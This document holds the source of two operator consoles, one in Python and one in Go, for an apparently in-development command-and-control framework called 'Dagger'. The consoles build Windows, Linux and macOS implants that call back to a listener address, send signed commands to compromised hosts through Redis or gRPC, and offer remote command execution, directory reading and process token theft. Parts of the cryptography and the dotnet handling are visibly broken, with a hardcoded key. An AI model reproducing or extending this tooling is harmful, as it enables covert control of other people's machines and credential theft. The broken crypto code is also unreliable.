File: Listeners/controller.py
import base64
import subprocess
import redis
from datetime import datetime, time
import json
import cryptography.exceptions
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

import binascii
import os

# Needs a function to wipe the db and make all active beacons check in again
# Right now when the database is wiped, the beacons will not check in again
conn = redis.StrictRedis(host='localhost', port=6379, db=0)
key = b'12345678901234567890123456789012'  # A 256 bit (32 byte) key

ROOT_DIR = os.path.dirname(os.path.abspath(__file__))


def builder(platform, arch, name, listener):
    if subprocess.Popen(f"go run builder.go {platform} {arch} {name} {listener}", shell=True, stdout=subprocess.PIPE,
                     cwd=r'../Builder'):
        print("Finished")



def clearDB():
    for key in conn.scan_iter("*"):
        conn.delete(key)


def decrypt_message(key, ciphertext, nonce):
    backend1 = default_backend()
    salt = b'salt'  # Salt used for key derivation

    # Derive a 256-bit encryption key using PBKDF2
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,
        salt=salt,
        iterations=100000,
        backend=backend1
    )
    key = kdf.derive(key)

    # Create a XChaCha20-Poly1305 cipher object
    cipher = Cipher(
        algorithms.XChaCha20(key, nonce),
        mode=None,
        backend=backend1
    )
    decryptor = cipher.decryptor()

    # Decrypt the ciphertext
    plaintext = decryptor.update(ciphertext) + decryptor.finalize()

    return plaintext


def encrypt_message(key, plaintext):
    backend1 = default_backend()
    salt = b'salt'  # Salt used for key derivation

    # Derive a 256-bit encryption key using PBKDF2
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,
        salt=salt,
        iterations=100000,
        backend=backend1
    )
    key = kdf.derive(key)

    # Generate a random nonce
    nonce = default_backend().random(bytes(ChaCha20Poly1305.XChaCha20.NONCE_SIZE))

    # Create a XChaCha20-Poly1305 cipher object
    cipher = Cipher(
        ChaCha20Poly1305.XChaCha20(key, nonce),
        mode=None,
        backend=backend1
    )
    encryptor = cipher.encryptor()

    # Encrypt the plaintext
    ciphertext = encryptor.update(plaintext) + encryptor.finalize()

    return ciphertext, nonce


def searchUUID(uuid):
    dt = conn.hget('UUID', uuid)
    dt = dt.decode()  # Decode it from bytes
    lastcheckin = json.loads(dt)  # it's returned as string so convert it to dict
    structure = json.dumps(lastcheckin)  # Dump the dict to json
    connector = json.loads(structure)  # Load it into a new var
    name = connector["WhoAmI"]
    print(name)


while True:
    # We should change this to a help dialogue
    # If command is empty, display the help dialogue
    # Add a GetLastCommand command
    # Add an interact option so that you enter a session with a beacon
    # Sort of akin to Sliver
    # Add an await option. After a command, await the redis update, then display
    # Set command and then await for a new var to be set
    # We will set the retrieved value when it fetches a new command
    # If retrieved is 0, then don't display. If it's 1, display the result and then reset to 0
    inp = input('> ')
    inp = inp.lower()
    if inp == '1':
        print('Commands possible: \n'
              'pwd      - get the current working directory \n'
              'gcu      - get the current user \n'
              'rc       - run a single command \n'
              'rd       - read a directory \n'
              'terminal - Enter a terminal command \n'
              'pid      - returns current PID \n'
              'new_token_process  - Starts a new process with the token of your choice. Expects a PID to steal from and path \n'
              )
        uuid = input('UUID: ')
        # while inp != "exit":  # If the input is exit, break the loop
        choice = input('Command: ')
        choice = choice.lower()
        splits = choice.split()
        if splits[0] == "new_token_process":
            cm = splits[0:]
        if splits[0] == "terminal":
            cm = splits[1:]
            cm = ''.join(cm)
        elif splits[0] == "dotnet":
            path = splits[1:]
            with open(path, "rb") as in_file:
                cm = "dotnet-exe "
                in_file = base64.b64encode(bytes(in_file, 'utf-8'))
                cm.append(in_file)
        else:
            cm = choice
        # I want to preserve the current last check in time
        # so dump the DB and grab that field
        dt = conn.hget('UUID', uuid)  # Get the struct
        dt = dt.decode()  # Decode it from bytes
        lastcheckin = json.loads(dt)  # it's returned as string so convert it to dict
        structure = json.dumps(lastcheckin)  # Dump the dict to json
        connector = json.loads(structure)  # Load it into a new var
        LastInteraction = connector["LastInteraction"]
        whoami = connector["WhoAmI"]
        nonce = connector["Nonce"]
        result = connector["Result"]
        byte_inp = bytes(cm, 'utf-8')

        with open('../Builder/keys/' + uuid + ".pem", "rb") as key_file:  # Read in the pem file for the UUID
            private_key = serialization.load_pem_private_key(key_file.read(), password=None)
        signature = private_key.sign(
            byte_inp,
            padding.PKCS1v15(),
            hashes.SHA256()
        )
        signature_decoded = binascii.b2a_hex(signature).decode()

        with open("../global.pub.pem", "rb") as key_file:  # Read in the pem file for the UUID
            public_key = serialization.load_pem_public_key(key_file.read())
        try:
            public_key.verify(
                signature,
                byte_inp,
                padding.PKCS1v15(),
                hashes.SHA256()
            )
        except cryptography.exceptions.InvalidSignature as e:
            print('ERROR: Payload and/or signature files failed verification!')
            break
        print(signature_decoded)

        b = base64.b64encode(signature)
        # chacha = ChaCha20Poly1305(key)
        # nonce = os.urandom(12)
        # print(nonce)
        # byte_cm = bytes(cm, 'utf-8')
        # cm = chacha.encrypt(nonce, byte_cm, nonce)
        # cm, nonce = encrypt_message(key, cm) # Encrypt the message
        # encode the nonce to string before saving it
        # decoded_nonce = base64.b64encode(nonce).decode('utf-8')
        # chacha.decrypt(nonce, cm, nonce)
        # print(decoded_nonce)
        structure = {
            "WhoAmI": f"{whoami}",
            "Nonce": f"{0}",
            "Signature": f"{signature_decoded}",
            "Retrieved": "1",  # Set retrieved to 1 so we know we got results
            "Command": f"{cm}",
            "LastInteraction": f"{LastInteraction}",
            "LastCheckIn": f"{datetime.today().strftime('%Y-%m-%d %H:%M:%S')}",
            "Result": f"{result}",
            "GotIt": "0"
        }
        structure = json.dumps(structure)  # Dump the json
        # Write the message value to the beacon:UUID key
        conn.hset('UUID', uuid, structure)
        print("Set command... \n")
        # Await the beacon retrieving the command
        # Check the db for an update value
        canWeDisplay = connector["GotIt"]
        print("Waiting for returned data... \n")
        while canWeDisplay == "0":
            # We have to refresh the DB connectors to get updated results it seems
            dt = conn.hget('UUID', uuid)  # Get the struct
            dt = dt.decode()  # Decode it from bytes
            lastcheckin = json.loads(dt)  # it's returned as string so convert it to dict
            structure = json.dumps(lastcheckin)  # Dump the dict to json
            connector = json.loads(structure)  # Load it into a new var
            canWeDisplay = connector["GotIt"]
        result = connector["Result"]
        # print(result)
        # result = base64.decode(result)
        result = bytes(result, 'utf-8')
        print(result)

    elif inp == '2':
        uuid = input('UUID: ')
        searchUUID(uuid)
    elif inp == '3':
        clearDB()
    elif inp == "4":
        subprocess.Popen(["python3", "listener.py"])
    elif inp == "5":
        # print(conn.keys()) # UUID is the key, but we want values from the key
        print(conn.hgetall('UUID'))  # We're searching by hash values here
    elif inp == '6':
        txt = input("Expects platform arch name listener \n"
                       "windows amd64 first http://test.culbertreport:8000 \n"
                       "BUILDER > ")
        splits = txt.split(" ")
        builder(splits[0], splits[1], splits[2], splits[3])

    else:
        print('\n '
              '(1)Enter session \n '
              '(2)Search by UUID \n '
              '(3)Clear DB \n '
              '(4)Start a listener \n '
              '(5)List all \n'
              '(6)Implant builder \n')

File: Listeners/controller.go
/*
Need to:
Provide interaction with beacons through the API like setting commmands
-This is done in our examples already
Provide the abiilty to interact with the generator
-This is also done in the examples
We need to be able to sign messages
-Verifying the signature is already done in the implant, so how hard is it to generate a signature?
Start all the gRPC servers and make them ready for data
Start the listeners as needed, perhaps with the option to point to a cert of our choosing and port
-They should then be able to list all running listeners
*/

package main

import (
	// go mod init dagger/proto/daggerProto - which led to the duplicate import
	"context"
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"encoding/base64"
	"encoding/pem"
	"errors"
	"fmt"
	"io/ioutil"
	"log"
	"strings"
	"time"

	pb "CloakNDaggerC2/dagger/proto/daggerProto"

	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials/insecure"
)

type impInfo struct {
	UUID        string
	Whoami      string
	Signature   string
	Retrieved   int32
	Command     string
	LastCheckIn string
	Result      string
	GotIt       int32
}

func sign(command string) (string, error) {
	KeyPEM, err := ioutil.ReadFile("../global.pem")

	PEMBlock, _ := pem.Decode([]byte(KeyPEM))
	if PEMBlock == nil {
		err := errors.New("Could not parse Private Key PEM")
		return "", err
	}

	key, err := x509.ParsePKCS1PrivateKey(PEMBlock.Bytes)

	toSign := []byte(command)
	hashed := sha256.Sum256(toSign)

	byte_sig, err := rsa.SignPKCS1v15(rand.Reader, key, crypto.SHA256, hashed[:])
	// We need to b64 encode this sig now

	if err != nil {
		return "", err
	}

	sig := base64.StdEncoding.EncodeToString(byte_sig)

	return sig, nil

}

func set(command, uuid, signature string) (int32, error) {
	conn, err := grpc.Dial("localhost:50055", grpc.WithTransportCredentials(insecure.NewCredentials()), grpc.WithBlock())
	if err != nil {
		log.Fatalf("did not connect : %v", err)
	}

	defer conn.Close()

	c := pb.NewUpdateRecordClient(conn)

	ctx, cancel := context.WithTimeout(context.Background(), time.Second)

	defer cancel()

	data := impInfo{
		// The issue I'm envisioning, I want to preserve the whoami and lastcheckin vals
		// In Python I was just running native DB queries and saving those vals to vars
		// With the API this will be more intensive and cumbersome
		// Right now we're ignoring the problem
		UUID: uuid, Whoami: "", Signature: signature, Retrieved: 0, Command: command, LastCheckIn: "", Result: "", GotIt: 0,
	}

	res, err := c.SendUpdate(ctx, &pb.UpdateObject{UUID: data.UUID, Whoami: data.Whoami, Signature: data.Signature,
		Retrieved: data.Retrieved, Command: data.Command, LastCheckIn: data.LastCheckIn, Result: data.Result,
		GotIt: data.GotIt})

	code := res.GetCode()

	if err != nil {
		return code, err
	}

	return code, nil

}

func dumpDB(UUID string) ([]string, error) {
	conn, err := grpc.Dial("localhost:50055", grpc.WithTransportCredentials(insecure.NewCredentials()), grpc.WithBlock())
	if err != nil {
		return nil, err
	}

	defer conn.Close()

	c := pb.NewGetAllClient(conn)

	ctx, cancel := context.WithTimeout(context.Background(), time.Second)

	defer cancel()

	results, err := c.GetAll(ctx, &pb.GetKey{Key: UUID})

	if err != nil {
		return nil, err
	}

	return results.Res, nil
}

func UUID_info(UUID string) (impInfo, error) {
	// Takes a UUID as a string
	// Returns either an empty struct and error or a full struct and no error
	conn, err := grpc.Dial("localhost:50055", grpc.WithTransportCredentials(insecure.NewCredentials()), grpc.WithBlock())
	if err != nil {
		return impInfo{}, err
	}

	defer conn.Close()

	c := pb.NewHgetRecordClient(conn)

	ctx, cancel := context.WithTimeout(context.Background(), time.Second)

	defer cancel()

	res, err := c.Hget(ctx, &pb.GetUUID{UUID: UUID})

	if err != nil {
		return impInfo{}, err
	}
	return impInfo{UUID: UUID,
		Whoami:      res.Whoami,
		Signature:   res.Signature,
		Retrieved:   res.Retrieved,
		Command:     res.Command,
		LastCheckIn: res.LastCheckIn,
		Result:      res.Result,
		GotIt:       res.GotIt,
	}, nil

}

func build(platform, arch, name, listener string) (uint16, error) {
	fmt.Printf("Attempting to compile... \n")
	conn, err := grpc.Dial("localhost:50053", grpc.WithTransportCredentials(insecure.NewCredentials()), grpc.WithBlock())
	if err != nil {
		return 1, err
	}

	defer conn.Close()

	c := pb.NewBuilderClient(conn)

	ctx, cancel := context.WithTimeout(context.Background(), time.Second)

	defer cancel()
	res, err := c.StartBuilding(ctx, &pb.BuildRoutine{Platform: platform, Architecture: arch, Name: name, ListenerAddress: listener})

	if err != nil {
		return 1, err
	}
	return uint16(res.GetCode()), nil
}

func main() {
	red := "\033[31m"
	green := "\033[32m"
	yellow := "\033[33m"
	blue := "\033[34m"
	reset := "\033[0m"
	for {
		var input string
		for {
			fmt.Printf("%sDagger controller home menu \n%s", yellow, reset)
			fmt.Printf("Type help for the info menu \n")
			fmt.Printf("%scontroller > %s", blue, reset)
			fmt.Scan(&input)
			input = strings.ToLower(input)

			switch input {
			case "1":
				var platform, arch, name, listener string
				fmt.Printf("Build menu \n")
				fmt.Printf("This menu allows you to build a Dagger implant \n")
				fmt.Printf("Type exit and hit return to leave at any time \n")
				fmt.Printf("The builder expects, in order, the platform to compile for, the architecture, the output file name, and the listener address and port to use \n")
				fmt.Printf("windows amd64 example https://test.culbertreport:8000 \n")
				fmt.Printf("%sBuilder > %s", red, reset)
				fmt.Scan(&platform, &arch, &name, &listener)
				platform = strings.ToLower(platform)
				arch = strings.ToLower(arch)
				name = strings.ToLower(name)
				listener = strings.ToLower(listener)
				switch platform {
				case "windows", "linux", "darwin":
					res, err := build(platform, arch, name, listener)
					fmt.Println(res, err)
				case "exit":
					fmt.Printf("Returning to the controller \n")
					break
				default:
					fmt.Printf("The builder expects, in order, the platform to compile for, the architecture, the output file name, and the listener address to use \n")
					fmt.Printf("windows amd64 example https://test.culbertreport:8000 \n")
					fmt.Printf("Type exit and hit return to leave at any time \n")
				}

			case "2":
				var uuid string
				fmt.Printf("Implant control menu \n")
				fmt.Printf("Here's where you can interact with all your fun implants \n")
				fmt.Printf("You just need to know the UUID to get started \n")
				fmt.Printf("Type exit and hit return to leave at any time \n")
				fmt.Printf("%sUUID > %s", green, reset)
				fmt.Scan(&uuid)
				uuid = strings.ToLower(uuid)
				// We don't know what to expect for the UUID so we need to look it up and then determine the case
				_, err := UUID_info(uuid)
				// We check if it exists and, if not, then we break out of the loop
				// err should be nil if the UUID exists
				if err != nil {
					fmt.Printf("The UUID does not exist, double check how you entered it: error %s \n", err)
					fmt.Printf("The control menu needs a UUID to find the implant you want to interact with \n")
					fmt.Printf("Type exit and hit return to leave at any time \n")
					break
				}
				// We should also add a field for the sleep timer so that way we can guess when the implant will check in
				// Based on the lastCheckIn var
				switch uuid {
				case "exit":
					fmt.Printf("Returning to the controller \n")
					break
				default:
					res, err := UUID_info(uuid)
					if err != nil {
						fmt.Println(err)
					}
					fmt.Printf("The last command issued was: %s\n", res.Command)
					fmt.Printf("The result of that was: %s\n", res.Result)

				}

			case "3":
				var key string
				fmt.Printf("Lists all implants and deets \n")
				fmt.Printf("Just need the key to search for, in most cases this will be UUID \n")
				fmt.Printf("Type exit and hit return to leave at any time \n")
				fmt.Printf("%sKey > %s", green, reset)
				fmt.Scan(&key)
				key = strings.ToLower(key)
				switch key {
				case "exit":
					break
				default:
					key = strings.ToUpper(key)
					res, err := dumpDB(key)
					if err != nil {
						fmt.Print(err)
					}
					fmt.Println(res)
				}

			case "4":
				// Need to get a signature
				// Need to set that signature and command
				// Need to then wait for the listener to update the db that the command was retrieved
				// Then display the output
				var cmd, uuid string
				fmt.Printf("This is the menu for interacting with implants \n")
				fmt.Printf("This requires an implant ID to assign the command to \n")
				fmt.Printf("Once you've specified an implant ID, you then can enter in your command \n")
				fmt.Printf("Type exit and hit enter at any time to leave at any time \n")
				fmt.Printf("%sEnter the target implant UUID > %s", red, reset)
				fmt.Scan(&uuid)
				uuid = strings.ToLower(uuid)
				if uuid == "exit" {
					break
				}
				fmt.Printf("%sEnter the command you want executed > %s", red, reset)
				fmt.Scan(&cmd)
				cmd = strings.ToLower(cmd)
				if cmd == "exit" {
					break
				}
				sig, err := sign(cmd)
				if err != nil {
					fmt.Print(err)
				}
				res, err := set(cmd, uuid, sig)
				if res != 0 || err != nil {
					fmt.Print(err)
				}
				fmt.Printf("Command set \n")

			case "help":
				fmt.Printf("Help menu \n")
				fmt.Printf("The interpreter expects 1 - 4 as commands \n")
				fmt.Printf("1 will bring you to the build menu where you can build an implant \n")
				fmt.Printf("2 will bring you to the implant info menu where you can find the last command run and the result \n")
				fmt.Printf("3 will you to list all implants in the DB \n")
				fmt.Printf("4 allows you to interact with implants by setting commands \n")
				fmt.Printf("5 will let you start a listener on an address and port combo \n")
				fmt.Printf("'help' will bring you to this menu \n")

			default:
				fmt.Printf("Help menu \n")
				fmt.Printf("The interpreter expects 1 - 4 as commands \n")
				fmt.Printf("1 will bring you to the build menu where you can build an implant \n")
				fmt.Printf("2 will bring you to the implant info menu where you can find the last command run and the result \n")
				fmt.Printf("3 will you to list all implants in the DB \n")
				fmt.Printf("4 allows you to interact with implants by setting commands \n")
				fmt.Printf("5 will let you start a listener on an address and port combo \n")
				fmt.Printf("'help' will bring you to this menu \n")
			}
		}
	}

}
